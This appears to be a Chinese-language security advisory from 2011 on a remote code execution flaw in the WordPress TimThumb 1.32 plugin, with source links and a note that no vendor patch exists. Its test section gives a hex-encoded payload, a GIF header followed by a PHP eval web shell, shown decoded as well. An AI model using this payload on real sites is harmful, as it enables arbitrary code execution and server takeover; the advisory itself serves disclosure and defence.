WordPress TimThumb插件远程代码执行漏洞

发布日期:2011-08-03
更新日期:2011-08-03

受影响系统:
WordPress TimThumb 1.32
描述:
--------------------------------------------------------------------------------
WordPress是一种使用PHP语言和MySQL数据库开发的Blog(博客、网志)引擎,用户可以在支持PHP和MySQL数据库的服务器上建立自己的Blog。

WordPress TimThumb插件在实现上存在远程代码执行漏洞,远程攻击者可利用此漏洞在受影响应用程序中执行任意代码。

此漏洞源于脚本没有正确远程检查上传的缓存文件,通过构造带有有效MIME类型的图像文件,然后再附加PHP代码,可欺骗TimThumb使其认为是合法图像,然后本地缓存在缓存目录。

<*来源:MaXe
 
  链接:http://www.exploit-db.com/exploits/17602/
        http://packetstormsecurity.org/news/view/19615/Zero-Day-Bug-Threatens-Many-WordPress-SItes.html
        http://code.google.com/p/timthumb/issues/detail?id=212
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

(Transparent GIF + <?php @eval($_GET['cmd']) ?>

建议:
--------------------------------------------------------------------------------
厂商补丁:

WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://wordpress.org/

相关推荐